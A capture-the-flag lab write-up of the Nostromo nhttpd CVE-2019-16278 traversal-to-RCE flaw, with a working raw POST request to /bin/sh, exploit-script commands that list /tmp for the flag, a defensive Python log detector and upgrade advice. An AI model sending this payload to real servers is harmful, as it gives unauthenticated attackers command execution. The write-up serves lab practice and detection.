Vulnerability introduction
Nostromo nhttpd is an open source web server. nhttpd has a flaw in its URL validation that allows directory traversal: anyone can reach any file on the system through the web root. A remote, unauthenticated attacker can therefore point the server at a shell such as /bin/sh and execute arbitrary commands.
Impact version
nhttpd version <= 1.9.6
Problem solving process
1. Start the range (lab) environment
2. Capture the request with Burp Suite and verify the POC
POC (raw HTTP request; note the blank line that separates the headers from the body):

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25

echo
echo
ifconfig 2>&1
3. Exploit with the script
Script address: https://github.com/jas502n/CVE-2019-16278
./CVE-2019-16278.sh <IP address> <port> id
Once the exploit succeeds, other commands can be tested the same way. I won't spend time on that here; I will go straight to the command that retrieves the flag. The other commands are left for you to explore yourself.
Anyone who has worked in the vulfocus range before knows that the flag is in the /tmp directory, so let's go straight to /tmp to find it.
./CVE-2019-16278.sh <IP address> <port> "cd /tmp&&ls"
The flag was obtained successfully.
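From the defender's side, the POC above is easy to recognise in logs once you know the trick: the request target carries a percent-encoded carriage return (`%0d`) between two dots in each path segment, which survives the server's `../` check and collapses to `..` after decoding. The following is an added detection example, not code from the write-up or from the nhttpd project. It parses HTTP request lines (the sample lines are constructed, not captured traffic), decodes the path the way the exploit relies on, and flags both the encoded-CR/LF shape and any `..` segment that remains after decoding.

```python
"""Detect CVE-2019-16278-style traversal attempts in HTTP request lines.

Added defensive example; not part of the original write-up or of nhttpd.
It looks for the encoded-CR/LF trick (".%0d./") used by the POC and, more
generally, for any ".." segment that survives percent-decoding.
"""
import re
from urllib.parse import unquote

# Constructed sample request lines, not captured traffic.
SAMPLE_REQUEST_LINES = [
    "GET /index.html HTTP/1.0",
    "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0",
    "GET /../../etc/passwd HTTP/1.0",
    "GET /docs/release%20notes.txt?v=2 HTTP/1.1",
    "GET /.%0a./.%0a./etc/passwd HTTP/1.0",
]

# A dot, an encoded CR or LF, then another dot inside one path segment:
# the shape that let the traversal slip past the server's "../" filter.
_ENCODED_CRLF_DOTS = re.compile(r"\.%0[dDaA]\.")


def decode_path(raw_target: str) -> str:
    """Percent-decode the request target (minus any query string) and drop
    bare CR/LF characters, mirroring how ".%0d." ends up as ".."."""
    path = raw_target.split("?", 1)[0]
    return unquote(path).replace("\r", "").replace("\n", "")


def has_dotdot_segment(path: str) -> bool:
    """True if any path segment is exactly "..", i.e. the request tries to
    climb out of the document root."""
    return ".." in path.split("/")


def classify_request_line(line: str) -> dict:
    """Parse one request line and report traversal indicators."""
    parts = line.split(" ")
    if len(parts) != 3:
        raise ValueError(f"not an HTTP request line: {line!r}")
    method, raw_target, _version = parts
    decoded = decode_path(raw_target)
    crlf_trick = _ENCODED_CRLF_DOTS.search(raw_target) is not None
    traversal = has_dotdot_segment(decoded)
    return {
        "method": method,
        "raw_target": raw_target,
        "decoded_path": decoded,
        "encoded_crlf_dots": crlf_trick,
        "traversal": traversal,
        "suspicious": crlf_trick or traversal,
    }


def scan_request_lines(lines) -> list:
    """Return the classification of every suspicious request line."""
    return [r for r in (classify_request_line(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(f"{hit['method']} {hit['raw_target']} -> {hit['decoded_path']} "
              f"(crlf trick={hit['encoded_crlf_dots']}, traversal={hit['traversal']})")
```

The two indicators are kept separate on purpose: the encoded-CR/LF pattern is specific to this bug and is a high-confidence signal on its own, while a `..` segment after decoding catches plain traversal attempts that nhttpd already rejected but that are still worth alerting on. Feed the function real request lines from your access log or proxy and review the `decoded_path` field to see what the server would actually have tried to open.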
Solution
Upgrade to the latest version, 1.9.7.